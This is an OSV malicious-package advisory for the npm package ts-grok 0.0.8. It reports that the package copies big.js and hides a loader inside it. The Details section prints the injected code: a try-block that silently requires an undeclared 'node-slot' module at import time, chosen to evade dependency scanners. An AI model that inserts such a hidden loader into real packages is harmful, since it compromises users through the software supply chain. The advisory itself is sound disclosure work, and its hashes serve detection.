MAL-2026-6321

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-grok/MAL-2026-6321.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6321

Published

2026-06-23T16:11:24Z

Modified

2026-06-23T17:01:26.039860290Z

Summary

Malicious code in ts-grok (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (a981e7e3ba27d859a2c536cbc25c04ebece92e1992035226ea9246d8bd381f1d)

Package ts-grok ships a verbatim copy of big.js v7.0.1 (same banner, author 'Michael Mclaughlin', repository URL https://github.com/MikeMcl/big.js.git, and identical keywords) with a single foreign code block injected into both big.js and big.mjs: try { const doc = require("node-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }. The require fires whenever a consumer imports the package, and all errors are swallowed so the call is invisible. The declared runtime dependency in package.json is 'block-slot' (^1.0.9), not 'node-slot' — the actual loaded module name does not match anything declared, so dependency-review tooling and SCA scanners auditing package.json will not see the real second-stage module. Whatever 'node-slot' resolves to in the installer's node_modules is executed silently at import time. The package has no legitimate relationship to big.js; the impersonation is the lure and the hidden loader is the payload.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "a981e7e3ba27d859a2c536cbc25c04ebece92e1992035226ea9246d8bd381f1d",
            "id": "IN-MAL-2026-007267",
            "source": "amazon-inspector",
            "modified_time": "2026-06-23T16:11:24Z",
            "versions": [
                "0.0.8"
            ],
            "import_time": "2026-06-23T16:54:13.236632759Z"
        }
    ]
}

References

https://www.npmjs.com/package/ts-grok/v/0.0.8

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / ts-grok

Package

Name: ts-grok; View open source insights on deps.dev
Purl: pkg:npm/ts-grok

Affected ranges

Affected versions

0.*

0.0.8

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-grok/MAL-2026-6321.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "sha256": "442c54a9b0beff03159cb7dd3a59ad1c09dbe09f0bcec91df0a33a032a2e4f99",
            "tlsh": "c6c2658c3ac67579593363788f465088eb38525712c8b286b4ae63b46f78cb107b5fdc",
            "path": "big.js"
        },
        {
            "sha256": "739334ffdefefe319046de805c6062f07e589edb4880a7f6153d8aa0efb7b3e5",
            "tlsh": "b3210463c9a19da70af85b947c6c03aaf1161b1f04a05c5bb07b130c4b3355b2095b7d",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "ts-grok-0.0.8.tgz",
            "hashes": {
                "sha1": "55fc69d040bbff102422d54f5ac62b4e80430a43",
                "sha512_sri": "sha512-hXK5Xw/okq+3SASoi0qwX5MRlQUnwzsXjmaRODEO/v+auPfYbz89BWpeySigTC5LbUhkkhwVwKV+JDfqnBL1tQ=="
            }
        }
    ]
}